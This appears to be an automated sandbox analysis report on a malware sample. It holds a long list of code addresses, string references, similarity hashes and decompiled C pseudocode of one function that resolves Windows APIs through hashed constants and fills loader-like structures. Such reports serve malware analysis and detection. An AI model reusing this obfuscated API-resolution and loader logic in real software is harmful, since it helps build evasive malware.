0x003c7911
0x003c7913
0x003c7913
0x003c7916
0x003c792a
0x003c792e
0x003c793a
0x003c793a
0x003c7940
0x003c7940
0x003c7945
0x003c7949
0x003c794d
0x003c794f
0x00000000
0x00000000
0x003c7955
0x003c7958
0x003c795a
0x00000000
0x003c795c
0x003c795c
0x003c7962
0x003c7973
0x003c7973
0x00000000
0x003c7964
0x003c7964
0x003c7968
0x00000000
0x00000000
0x003c796a
0x003c796b
0x003c7971
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c7971
0x003c7964
0x003c7962
0x00000000
0x003c795a
0x003c7f7e
0x003c7f81
0x003c7918
0x003c791a
0x003c791c
0x003c791c
0x003c791f
0x003c791f
0x003c7923
0x00000000
0x00000000
0x003c7925
0x003c7926
0x003c7928
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c7928
0x003c791f
0x003c7916
0x003c7978
0x003c7978
0x003c7978
0x003c797c
0x003c797e
0x003c79a4
0x003c79a7
0x003c79aa
0x003c79ae
0x00000000
0x00000000
0x00000000
0x003c7980
0x003c7980
0x003c7982
0x003c7f2c
0x003c7f31
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c7988
0x003c7988
0x003c798b
0x003c798d
0x003c7992
0x003c7f37
0x003c7f37
0x003c79b4
0x003c79be
0x003c79c1
0x003c79c5
0x003c79c5
0x003c79cb
0x003c79d3
0x003c79d3
0x003c79d3
0x003c79d6
0x003c79dd
0x003c79e0
0x003c79e4
0x003c79e5
0x003c79ea
0x003c79ee
0x003c79f1
0x003c79f3
0x003c7a3a
0x003c79f5
0x003c79f5
0x003c79f9
0x003c79fb
0x003c79fd
0x003c7a00
0x003c7a02
0x003c7a04
0x003c7a06
0x003c7a0a
0x003c7a0a
0x003c7a0c
0x003c7a0e
0x003c7a0e
0x003c7a0f
0x003c7a14
0x003c7a18
0x003c7a1a
0x00000000
0x00000000
0x003c7a1c
0x003c7a20
0x003c7a23
0x003c7a25
0x00000000
0x00000000
0x00000000
0x003c7a25
0x003c7a27
0x003c7a27
0x003c7a04
0x003c7a2b
0x003c7a2d
0x003c7a2e
0x003c7a33
0x003c7a33
0x003c7a3d
0x003c7a40
0x003c7a40
0x003c7a42
0x003c7a44
0x003c7a46
0x00000000
0x003c7a46
0x003c7998
0x003c7998
0x003c7a49
0x003c7a49
0x003c7a4b
0x003c7a4d
0x003c7a4d
0x003c7a4f
0x003c7a4f
0x003c7a50
0x003c7a53
0x003c7a57
0x003c7a57
0x003c7a5a
0x00000000
0x00000000
0x003c7a5c
0x003c7a5e
0x003c7a61
0x00000000
0x00000000
0x00000000
0x003c7a61
0x003c7a4f
0x003c7a63
0x003c7a63
0x003c7a65
0x003c7a67
0x003c7a70
0x00000000
0x00000000
0x003c7a69
0x003c7a69
0x003c7a72
0x003c7a72
0x003c7a76
0x003c7a76
0x003c7a78
0x003c7a7c
0x003c7a7f
0x003c7a7f
0x003c7a83
0x003c7a86
0x003c7a88
0x00000000
0x00000000
0x003c7a8a
0x003c7a8a
0x003c7a8e
0x003c7a8f
0x003c7a91
0x00000000
0x00000000
0x00000000
0x003c7a91
0x003c7a93
0x003c7a97
0x003c7a97
0x003c7a9b
0x003c7a9b
0x003c7992
0x003c7982
0x003c797e
0x003c7889
0x003c7880
0x003c7a9e
0x003c7aa2
0x003c7aa8
0x003c7aaa
0x003c7aac
0x00000000
0x003c7aae
0x003c7aae
0x003c7ab1
0x003c7ac5
0x003c7ac7
0x00000000
0x003c7ac9
0x003c7acb
0x003c7acb
0x003c7ace
0x003c7ae2
0x003c7ae6
0x003c7af2
0x003c7af2
0x003c7af8
0x003c7af8
0x003c7afd
0x003c7b01
0x003c7b05
0x003c7b07
0x00000000
0x00000000
0x003c7b0d
0x003c7b10
0x003c7b12
0x00000000
0x003c7b14
0x003c7b14
0x003c7b1a
0x003c7b2b
0x003c7b2b
0x00000000
0x003c7b1c
0x003c7b1c
0x003c7b20
0x00000000
0x00000000
0x003c7b22
0x003c7b23
0x003c7b29
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c7b29
0x003c7b1c
0x003c7b1a
0x00000000
0x003c7b12
0x003c7f74
0x003c7f77
0x003c7ad0
0x003c7ad2
0x003c7ad4
0x003c7ad4
0x003c7ad7
0x003c7ad7
0x003c7adb
0x00000000
0x00000000
0x003c7add
0x003c7ade
0x003c7ae0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c7ae0
0x003c7ad7
0x003c7b30
0x003c7b30
0x003c7b32
0x003c7f6d
0x003c7b38
0x003c7b3a
0x003c7b3a
0x003c7b3d
0x003c7b51
0x003c7b55
0x003c7b61
0x003c7b65
0x003c7b65
0x003c7b6a
0x003c7b6a
0x003c7b6f
0x003c7b73
0x003c7b77
0x003c7b79
0x00000000
0x00000000
0x003c7b7f
0x003c7b82
0x003c7b84
0x00000000
0x003c7b86
0x003c7b86
0x003c7b8a
0x003c7b8f
0x003c7b9f
0x003c7b9f
0x00000000
0x003c7b91
0x003c7b91
0x003c7b95
0x00000000
0x00000000
0x003c7b97
0x003c7b98
0x003c7b9d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c7b9d
0x003c7b91
0x003c7b8f
0x00000000
0x003c7b84
0x003c7f5d
0x003c7f5f
0x003c7f62
0x003c7f66
0x003c7b3f
0x003c7b41
0x003c7b43
0x003c7b43
0x003c7b46
0x003c7b46
0x003c7b4a
0x00000000
0x00000000
0x003c7b4c
0x003c7b4d
0x003c7b4f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c7b4f
0x003c7b46
0x003c7b3d
0x003c7ba4
0x003c7ba4
0x003c7ba4
0x003c7ba8
0x003c7baa
0x003c7bd0
0x003c7bd3
0x003c7bd6
0x003c7bda
0x00000000
0x00000000
0x00000000
0x003c7bac
0x003c7bac
0x003c7bae
0x003c7fa2
0x003c7fa7
0x00000000
0x00000000
0x00000000
0x00000000
0x003c7bb4
0x003c7bb4
0x003c7bb7
0x003c7bb9
0x003c7bbe
0x003c7fa9
0x003c7fa9
0x003c7be0
0x003c7bea
0x003c7bed
0x003c7bf1
0x003c7bf1
0x003c7bf6
0x003c7bfe
0x003c7bfe
0x003c7bfe
0x003c7bff
0x003c7c0b
0x003c7c0e
0x003c7c12
0x003c7c13
0x003c7c17
0x003c7c1c
0x003c7c20
0x003c7c24
0x003c7c27
0x003c7c29
0x003c7c7f
0x003c7c2b
0x003c7c2b
0x003c7c30
0x003c7c32
0x003c7c34
0x003c7c37
0x003c7c39
0x003c7c3b
0x003c7c3d
0x003c7c41
0x003c7c41
0x003c7c43
0x003c7c47
0x003c7c47
0x003c7c48
0x003c7c4d
0x003c7c51
0x003c7c53
0x00000000
0x00000000
0x003c7c55
0x003c7c59
0x003c7c5c
0x003c7c5e
0x00000000
0x00000000
0x00000000
0x003c7c5e
0x003c7c60
0x003c7c64
0x003c7c64
0x003c7c3b
0x003c7c68
0x003c7c6a
0x003c7c6b
0x003c7c6f
0x003c7c74
0x003c7c78
0x003c7c78
0x003c7c82
0x003c7c86
0x003c7c86
0x003c7c88
0x003c7c8a
0x00000000
0x003c7c90
0x003c7c90
0x00000000
0x003c7c90
0x003c7bc4
0x003c7bc4
0x003c7c93
0x003c7c93
0x003c7c95
0x003c7c97
0x003c7c9b
0x003c7c9b
0x003c7c9d
0x003c7c9d
0x003c7c9e
0x003c7ca1
0x003c7ca5
0x003c7ca8
0x00000000
0x00000000
0x003c7caa
0x003c7cac
0x003c7caf
0x00000000
0x00000000
0x00000000
0x003c7caf
0x003c7cb1
0x003c7cb1
0x003c7cb5
0x003c7cb7
0x003c7cb9
0x003c7cc2
0x00000000
0x00000000
0x003c7cbb
0x003c7cbb
0x003c7cc4
0x003c7cc4
0x003c7ccc
0x003c7cd0
0x003c7cd4
0x003c7cd8
0x003c7cd8
0x003c7cdc
0x003c7cdf
0x003c7ce1
0x00000000
0x00000000
0x003c7ce3
0x003c7ce3
0x003c7ce7
0x003c7ce8
0x003c7cea
0x00000000
0x00000000
0x00000000
0x003c7cea
0x003c7cec
0x003c7cf0
0x003c7cf0
0x00000000
0x003c7cb9
0x003c7bbe
0x003c7bae
0x003c7baa
0x00000000
0x00000000
0x00000000
0x003c7ab1
0x00000000
0x003c7ab3
0x003c7ab7
0x003c7ab8
0x003c7ab8
0x00000000
0x003c7f41
0x003c7f45
0x003c7f46
0x003c7f46
0x003c7f4e
0x003c7f53
0x003c7f55
0x003c7e4b
0x003c7e4b
0x003c7e52
0x003c7e54
0x003c7e5a
0x003c7e5c
0x003c7e5e
0x003c7e95
0x003c7e60
0x003c7e60
0x003c7e62
0x003c7e64
0x003c7e67
0x003c7e69
0x003c7e6b
0x003c7e6d
0x003c7e6d
0x003c7e6f
0x003c7e6f
0x003c7e70
0x003c7e75
0x003c7e79
0x003c7e7b
0x00000000
0x00000000
0x003c7e7d
0x003c7e81
0x003c7e84
0x003c7e86
0x00000000
0x00000000
0x00000000
0x003c7e86
0x003c7e6f
0x003c7e6b
0x003c7e88
0x003c7e88
0x003c7e8a
0x003c7e8b
0x003c7e90
0x003c7e90
0x003c7e98
0x003c7e9b
0x003c7e9d
0x00000000
0x003c7cf4
0x003c7cf8
0x003c7cf9
0x003c7cfc
0x003c7cfc
0x003c7d04
0x003c7d04
0x003c7d07
0x003c7d07
0x003c7d09
0x003c7d0b
0x003c7d0e
0x003c7d0e
0x003c7d11
0x00000000
0x003c7d17
0x003c7d19
0x003c7d19
0x003c7d1c
0x003c7d30
0x003c7d34
0x003c7d40
0x003c7d40
0x003c7d46
0x003c7d46
0x003c7d4b
0x003c7d4f
0x003c7d53
0x003c7d55
0x00000000
0x00000000
0x003c7d5b
0x003c7d5e
0x003c7d60
0x00000000
0x003c7d62
0x003c7d62
0x003c7d68
0x003c7d79
0x003c7d79
0x00000000
0x003c7d6a
0x003c7d6a
0x003c7d6e
0x00000000
0x00000000
0x003c7d70
0x003c7d71
0x003c7d77
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c7d77
0x003c7d6a
0x003c7d68
0x00000000
0x003c7d60
0x003c7ec1
0x003c7ec4
0x003c7d1e
0x003c7d20
0x003c7d22
0x003c7d22
0x003c7d25
0x003c7d25
0x003c7d29
0x00000000
0x00000000
0x003c7d2b
0x003c7d2c
0x003c7d2e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c7d2e
0x003c7d25
0x003c7d7e
0x003c7d83
0x003c7d83
0x003c7d86
0x003c7d89
0x003c7d8c
0x003c7d8e
0x003c7da1
0x003c7da4
0x003c7da4
0x003c7daa
0x003c7db2
0x003c7db2
0x003c7db2
0x003c7db5
0x003c7dbc
0x003c7dbf
0x003c7dc5
0x003c7dc7
0x003c7dcd
0x003c7dcf
0x003c7dd1
0x003c7e20
0x003c7dd3
0x003c7dd3
0x003c7dd5
0x003c7dd7
0x003c7dda
0x003c7ddc
0x003c7dde
0x003c7de0
0x003c7de2
0x003c7de5
0x003c7de9
0x003c7deb
0x003c7deb
0x003c7dec
0x003c7df1
0x003c7df5
0x003c7df7
0x00000000
0x00000000
0x003c7df9
0x003c7dfd
0x003c7e00
0x003c7e02
0x00000000
0x00000000
0x00000000
0x003c7e02
0x003c7e04
0x003c7e07
0x003c7e07
0x003c7dde
0x003c7e0b
0x003c7e0d
0x003c7e0e
0x003c7e12
0x003c7e17
0x003c7e1b
0x003c7e1b
0x003c7e23
0x003c7e26
0x003c7e29
0x003c7d90
0x003c7d90
0x003c7d90
0x003c7e2b
0x003c7e2d
0x003c7e2f
0x003c7e31
0x003c7e37
0x003c7e37
0x003c7e3a
0x003c7e3b
0x003c7e3d
0x003c7e3f
0x00000000
0x00000000
0x003c7e41
0x003c7e43
0x003c7ebb
0x00000000
0x00000000
0x00000000
0x00000000
0x003c7e45
0x003c7e45
0x003c7e47
0x003c7e35
0x003c7e36
0x003c7e36
0x00000000
0x003c7e36
0x00000000
0x003c7e47
0x003c7e37
0x003c7e2f
0x003c7d11
0x003c779f
0x003c7798
0x003c76f5
0x003c7ea4
0x003c7ea4
0x003c7ea6
0x003c7ea7
0x003c7eb8
0x003c7674
0x003c7674
0x003c7679
0x003c767b
0x003c767d
0x003c7685
0x003c7687
0x003c768d
0x003c7691
0x003c76c8
0x003c7693
0x003c7695
0x003c7697
0x003c769a
0x003c769e
0x003c76a0
0x003c76a2
0x003c76a2
0x003c76a3
0x003c76a8
0x003c76ae
0x00000000
0x00000000
0x003c76b0
0x003c76b4
0x003c76b9
0x00000000
0x00000000
0x00000000
0x003c76b9
0x003c76a2
0x003c769e
0x003c76bb
0x003c76bb
0x003c76bd
0x003c76be
0x003c76c3
0x003c76c3
0x003c76cb
0x003c76ce
0x003c76d5
0x003c76e0
0x003c76e0
0x00000000

Strings

@, xrefs: 003C7FA2
w8=, xrefs: 003C7848
w8=, xrefs: 003C789D, 003C787A, 003C7886, 003C78F2, 003C78C5, 003C7A7C

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID: @$w8=$w8=
API String ID: 0-3974748673
Opcode ID: 52cf54630ff8bdc2b50b66d371acd1fbb21b2ea9802d435e193b7f6b95655d85
Instruction ID: 92efa1d4b228518101d731331f79a79ed2f94e52083281d74dd22b068c047934
Opcode Fuzzy Hash: 52cf54630ff8bdc2b50b66d371acd1fbb21b2ea9802d435e193b7f6b95655d85
Instruction Fuzzy Hash: 4852F871A0C3524BD7278E38C490B2A7BD6AF96350F29876DEC96DB391DA34CD41CB81

Uniqueness

Uniqueness Score: -1.00%

Function 003A1570, Relevance: 3.6, Strings: 2, Instructions: 1143
COMMONCrypto

Download Yara Rule

C-Code - Quality: 41%

			E003A1570(signed int __ecx, void* __edx, void* __eflags) {
				char _v44;
				intOrPtr _v48;
				char _v56;
				char _v72;
				char _v80;
				void* _v116;
				char _v124;
				char _v128;
				signed int _v136;
				char _v140;
				char _v144;
				void* _v148;
				char _v152;
				signed int _v156;
				signed int _v160;
				intOrPtr _v164;
				signed int _v168;
				char _v172;
				char _v176;
				void* _v184;
				void* _v188;
				void* _v192;
				char _v196;
				void* _v212;
				char _v216;
				void* _v220;
				char _v224;
				char _v228;
				char _v236;
				char _v240;
				char _v244;
				char _v248;
				void* _v252;
				intOrPtr _v276;
				char _v280;
				char _v288;
				void* _v292;
				char _v296;
				void* _v300;
				intOrPtr _v308;
				signed int _v328;
				void* _v348;
				void* _v352;
				char _v356;
				char _v368;
				char _v372;
				void* _v380;
				char _v384;
				char _v388;
				char _v392;
				char _v396;
				char _v400;
				char _v408;
				char _v412;
				char _v416;
				char _v420;
				char _v428;
				char _v432;
				char _v436;
				char _v444;
				char _v448;
				char _v452;
				char _v456;
				char _v460;
				char _v464;
				char _v468;
				char _v472;
				char _v476;
				char _v480;
				char _v484;
				char _v488;
				char _v492;
				char _v496;
				char _v500;
				char _v504;
				char _v508;
				char _v512;
				char _v516;
				char _v520;
				char _v524;
				char _v528;
				char _v532;
				char _v536;
				char _v540;
				char _v544;
				char _v548;
				char _v552;
				char _v556;
				char _v560;
				char _v564;
				char _v568;
				char _v572;
				char _v576;
				char _v580;
				char _v584;
				char _v588;
				void* _v592;
				void* _v596;
				void* _v600;
				void* _v604;
				intOrPtr _v608;
				void* _v612;
				void* _v616;
				void* _v620;
				void* _v624;
				void* _v628;
				void* _v632;
				void* _v636;
				void* _v640;
				void* _v644;
				void* _v648;
				void* _v668;
				void* _v1676;
				void* _v1684;
				void* _v1692;
				void* _v1708;
				intOrPtr _v1800;
				intOrPtr _v1804;
				intOrPtr _v1808;
				intOrPtr _v1812;
				intOrPtr _v1816;
				void* _v1820;
				void* _v1824;
				void* _v1828;
				void* _v1832;
				void* _v1836;
				void* _v1840;
				void* _v1844;
				void* _v1848;
				void* _v1852;
				void* _v1856;
				void* _v1860;
				void* _v1864;
				void* _v1868;
				void* _v1872;
				void* _v1876;
				void* _v1956;
				void* _v1960;
				void* _v2760;
				void* _v2764;
				void* _v2768;
				void* _v2772;
				void* _v2776;
				intOrPtr _v2820;
				signed int _v2860;
				void* _v2864;
				intOrPtr _v2868;
				intOrPtr _v2872;
				intOrPtr _v2876;
				void* _v2880;
				intOrPtr _v2884;
				void* _v2888;
				void* _v2896;
				void* _v2904;
				intOrPtr _v2908;
				void* _v2912;
				intOrPtr _v2916;
				void* _v2920;
				void* _v2928;
				void* _v2936;
				void* _v2940;
				void* _v2944;
				void* _v2948;
				void* _v2952;
				void* _v2956;
				char _v2960;
				void* _v2964;
				void* _v2968;
				void* _v2976;
				void* _v2984;
				signed int _v2988;
				signed int _v2992;
				void* _v3000;
				void* _v3020;
				void* _v3048;
				void* _v3052;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t313;
				signed int _t317;
				void* _t322;
				signed int _t325;
				signed int _t329;
				void* _t345;
				intOrPtr _t368;
				signed int _t370;
				signed int _t379;
				signed int _t383;
				signed int _t387;
				signed int _t562;
				signed int _t571;
				signed int _t585;
				signed int _t586;
				signed int _t595;
				signed int _t599;
				signed int _t620;
				signed int _t621;
				signed int _t782;
				void* _t800;
				signed int _t803;
				void* _t812;
				signed int _t817;
				signed int _t820;
				signed int _t831;
				void* _t833;
				void* _t834;
				void* _t835;
				void* _t838;

				_t827 = _t831;
				_push(_t800);
				_t833 = (_t831 & 0xffffffe0) - 0xad4;
				_t595 = __ecx;
				_t812 = __edx;
				E003CB6B0( &_v44,  *((intOrPtr*)(__ecx + 0x1c)));
				_push(0);
				E003D1C80(__ecx,  &_v72, _t800, __edx, _t831, _v48);
				E003C0B10( &_v56);
				if(E003D1F90(_t595,  &_v80, _t831, 0) != 0) {
					_push(0);
					E003C9350( &_v168);
					_push(0);
					E003C9350( &_v156);
					_push(0);
					E003C9350( &_v144);
					__eflags = _t595;
					_t11 = _t595 + 0xc; // 0xc
					_t612 =  ==  ? _t595 : _t11;
					_t313 = E003CBEA0( ==  ? _t595 : _t11, 0x1d, _t812);
					__eflags = _t313;
					if(_t313 != 0) {
						_push(0x1fffff);
						E003CEA50(_t595);
					}
					__eflags = _t595;
					_t12 = _t595 + 0xc; // 0xc
					_t802 =  ==  ? _t595 : _t12;
					_push(0);
					_push(0);
					_t803 =  *( ==  ? _t595 : _t12);
					E003D2060(_t595,  &_v228, _t803, _t812);
					 *(_t833 + 0xa78) = 0;
					asm("pxor xmm0, xmm0");
					_v128 = 1;
					asm("movq [esp+0xa90], xmm0");
					 *((intOrPtr*)(_t833 + 0xa90)) = E003C9650(_t812);
					_t317 = E003B15C0(0x588ab3ea, 0xa65417fb);
					__eflags = _t317;
					if(_t317 == 0) {
						 *(_t833 + 0x40) = 0;
						E003CBDC0(_t833 + 0xa7c,  *((intOrPtr*)(_t833 + 0xa8c)));
						__eflags =  *(_t833 + 0x40);
						if( *(_t833 + 0x40) == 0) {
							_v124 = 0;
							_v136 = 0;
							_v140 = 0;
							 *((intOrPtr*)(_t833 + 0xa84)) = 0;
							_t782 = E003B15C0(0x588ab3ea, 0x9cac62c7);
							__eflags = _t782;
							if(_t782 != 0) {
								 *(_t833 + 0x40) =  *(_t833 + 0xa78);
								 *(_t833 + 0x44) = _t782;
								_t322 = E003C9650(_t812);
								_t783 =  *(_t833 + 0x44);
								 *(_t833 + 0x50) = _t803;
								_t803 =  *(_t833 + 0x78);
								_t325 =  *( *(_t833 + 0x44))( *((intOrPtr*)(_t833 + 0x64)), 0xffffffff, _t833 + 0xaa0, 0, _t322,  &_v140,  &_v124, 2, 0, 4);
								__eflags = _t325;
								if(_t325 == 0) {
									goto L11;
								} else {
									__eflags = _v168;
									if(_v168 != 0) {
										goto L53;
									}
									goto L54;
								}
							} else {
								L11:
								 *(_t833 + 0x40) = E003C9640(_t812, 0);
								E003B0C10(_v164,  *(_t833 + 0x44), E003C9650(_t812));
								_t833 = _t833 + 0xc;
								_t329 = E003B15C0(0x588ab3ea, 0xa8f2638d);
								__eflags = _t329;
								if(_t329 == 0) {
									 *(_t833 + 0x4bc) = 0;
									_t620 = E003B15C0(0x588ab3ea, 0xea812079);
									__eflags = _t620;
									if(_t620 == 0) {
										L17:
										_v140 =  *(_t833 + 0x4bc);
										_t621 = E003B15C0(0x588ab3ea, 0xea812079);
										__eflags = _t621;
										if(_t621 == 0) {
											L26:
											_v136 =  *(_t833 + 0x4bc);
											__eflags = _v168;
											if(_v168 != 0) {
												E003CBE30( &_v172, _t812);
											}
											__eflags = E003CED90(_t595) - 0x20;
											_push(0);
											_t336 =  ==  ? 0x3d8600 : 0x3d8c40;
											_push( ==  ? 0x3d8600 : 0x3d8c40);
											E003B1BA0(E003CED90(_t595) - 0x20, _t833 + 0xac0);
											E003C9B10( &_v240);
											E003C0B10( &_v124);
											E003C9670( &_v228, E003C9A90( &_v244, _t812));
											 *(_t833 + 0x40) = E003C9640( &_v248, 0);
											E003AAC20(_t827,  *(_t833 + 0x44), E003C9640( &_v236, 0),  *((intOrPtr*)(_t833 + 0xab8)));
											_t834 = _t833 + 8;
											_t345 = E003CED90(_t595);
											__eflags = _t345 - 0x20;
											if(_t345 == 0x20) {
												E003B0B70(_t834 + 0x40, 0, 0x47c);
												_t835 = _t834 + 0xc;
												 *((intOrPtr*)(_t835 + 0x44c)) = E003C9650(_t812);
												 *((intOrPtr*)(_t835 + 0x444)) = 0x56473829;
												 *((intOrPtr*)(_t835 + 0x46c)) = E003B15C0(0x588ab3ea, 0x9cac62c7);
												 *((intOrPtr*)(_t835 + 0x470)) = E003B15C0(0x588ab3ea, 0xa8f2638d);
												 *((intOrPtr*)(_t835 + 0x474)) = E003B15C0(0x588ab3ea, 0xd8cc7390);
												 *((intOrPtr*)(_t835 + 0x478)) = E003B15C0(0x588ab3ea, 0xd16c9225);
												 *((intOrPtr*)(_t835 + 0x47c)) = E003B15C0(0x588ab3ea, 0x649746ec);
												 *((intOrPtr*)(_t835 + 0x480)) = E003B15C0(0x588ab3ea, 0xe5ef1afa);
												 *((intOrPtr*)(_t835 + 0x484)) = E003B15C0(0x588ab3ea, 0x58d59bc9);
												 *((intOrPtr*)(_t835 + 0x488)) = E003B15C0(0x588ab3ea, 0x35b39b2b);
												 *((intOrPtr*)(_t835 + 0x48c)) = E003B15C0(0x588ab3ea, 0xe9fbf3a8);
												 *((intOrPtr*)(_t835 + 0x490)) = E003B15C0(0x588ab3ea, 0xbcd9ca71);
												 *((intOrPtr*)(_t835 + 0x494)) = E003B15C0(0x588ab3ea, 0x4faea65b);
												 *((intOrPtr*)(_t835 + 0x498)) = E003B15C0(0x588ab3ea, 0xc0b67de0);
												 *((intOrPtr*)(_t835 + 0x49c)) = E003B15C0(0x588ab3ea, 0x996e050f);
												 *((intOrPtr*)(_t835 + 0x4a0)) = E003B15C0(0x588ab3ea, 0x81c9e4a7);
												 *((intOrPtr*)(_t835 + 0x4a4)) = E003B15C0(0x588ab3ea, 0x97abe05f);
												_v1800 = E003B15C0(0x588ab3ea, 0x82d274c4);
												_v1804 = E003B15C0(0xa1310f65, 0x77be1f6);
												_v1808 = E003B15C0(0xa1310f65, 0xe2d27ff4);
												_v1812 = E003B15C0(0xa1310f65, 0x69121530);
												_t368 = E003B15C0(0xa1310f65, 0xf1c64384);
												 *((intOrPtr*)(_t835 + 0x464)) = _v308;
												_v1816 = _t368;
												 *((intOrPtr*)(_t835 + 0x468)) =  *((intOrPtr*)(_t835 + 0xa98));
												E003C9710( &_v368,  &_v2960, 0x47c);
												_push(_t835 + 0xa60);
												_push(0x4bc);
												_t785 =  &_v392;
												_t370 = E003AE900(_t595,  &_v392);
											} else {
												E003B0B70(_t834 + 0x4c0, 0, 0x4f0);
												_t838 = _t834 + 0xc;
												_v608 = E003C9650(_t812);
												 *((intOrPtr*)( &_v384 - 0xe8)) = 0x56473829;
												_push(0);
												E003C9350( &_v384);
												 *((intOrPtr*)(_t838 + 0x40)) = 0x3b4caff7;
												asm("pxor xmm0, xmm0");
												asm("movq [esp+0x48], xmm0");
												E003C9670( &_v388, E003C9650( &_v388) + 0x10);
												E003C9640( &_v392, E003C9650( &_v392) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												 *((intOrPtr*)(_t838 + 0x40)) = 0x9cac62c7;
												asm("movq [esp+0x48], xmm1");
												E003C9670( &_v396, E003C9650( &_v396) + 0x10);
												E003C9640( &_v400, E003C9650( &_v400) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												_v2820 = 0xa8f2638d;
												asm("movq [esp+0x48], xmm1");
												E003C9670(_t838 + 0x9b4, E003C9650(_t838 + 0x9b0) + 0x10);
												E003C9640( &_v408, E003C9650( &_v408) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												 *((intOrPtr*)(_t838 + 0x40)) = 0xd8cc7390;
												asm("movq [esp+0x48], xmm1");
												E003C9670( &_v412, E003C9650( &_v412) + 0x10);
												E003C9640( &_v416, E003C9650( &_v416) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												 *((intOrPtr*)(_t838 + 0x40)) = 0xd16c9225;
												asm("movq [esp+0x48], xmm1");
												E003C9670( &_v420, E003C9650( &_v420) + 0x10);
												E003C9640(_t838 + 0x9b4, E003C9650(_t838 + 0x9b0) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												 *((intOrPtr*)(_t838 + 0x40)) = 0x649746ec;
												asm("movq [esp+0x48], xmm1");
												E003C9670( &_v428, E003C9650( &_v428) + 0x10);
												E003C9640( &_v432, E003C9650( &_v432) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												 *((intOrPtr*)(_t838 + 0x40)) = 0xe5ef1afa;
												asm("movq [esp+0x48], xmm1");
												E003C9670( &_v436, E003C9650( &_v436) + 0x10);
												E003C9640(_t838 + 0x9b4, E003C9650(_t838 + 0x9b0) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												_v2860 = 0x58d59bc9;
												asm("movq [esp+0x48], xmm1");
												E003C9670( &_v444, E003C9650( &_v444) + 0x10);
												E003C9640( &_v448, E003C9650( &_v448) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												_v2868 = 0x35b39b2b;
												asm("movq [esp+0x48], xmm1");
												E003C9670( &_v452, E003C9650( &_v452) + 0x10);
												E003C9640( &_v456, E003C9650( &_v456) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												_v2876 = 0xe9fbf3a8;
												asm("movq [esp+0x48], xmm1");
												E003C9670( &_v460, E003C9650( &_v460) + 0x10);
												E003C9640( &_v464, E003C9650( &_v464) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												_v2884 = 0xbcd9ca71;
												asm("movq [esp+0x48], xmm1");
												E003C9670( &_v468, E003C9650( &_v468) + 0x10);
												E003C9640( &_v472, E003C9650( &_v472) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												 *((intOrPtr*)(_t838 + 0x40)) = 0x4faea65b;
												asm("movq [esp+0x48], xmm1");
												E003C9670( &_v476, E003C9650( &_v476) + 0x10);
												E003C9640( &_v480, E003C9650( &_v480) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												 *((intOrPtr*)(_t838 + 0x40)) = 0xc0b67de0;
												asm("movq [esp+0x48], xmm1");
												E003C9670( &_v484, E003C9650( &_v484) + 0x10);
												E003C9640( &_v488, E003C9650( &_v488) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												_v2908 = 0x996e050f;
												asm("movq [esp+0x48], xmm1");
												E003C9670( &_v492, E003C9650( &_v492) + 0x10);
												E003C9640( &_v496, E003C9650( &_v496) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												_v2916 = 0x81c9e4a7;
												asm("movq [esp+0x48], xmm1");
												E003C9670( &_v500, E003C9650( &_v500) + 0x10);
												E003C9640( &_v504, E003C9650( &_v504) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												 *((intOrPtr*)(_t838 + 0x40)) = 0x97abe05f;
												asm("movq [esp+0x48], xmm1");
												E003C9670( &_v508, E003C9650( &_v508) + 0x10);
												E003C9640( &_v512, E003C9650( &_v512) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												 *((intOrPtr*)(_t838 + 0x40)) = 0x82d274c4;
												asm("movq [esp+0x48], xmm1");
												E003C9670( &_v516, E003C9650( &_v516) + 0x10);
												__eflags = E003C9650( &_v520) + 0xfffffff0;
												E003C9640( &_v520, E003C9650( &_v520) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("movups [eax], xmm0");
												E003D1270(0x588ab3ea,  &_v524);
												E003C9640( &_v524, 0x10);
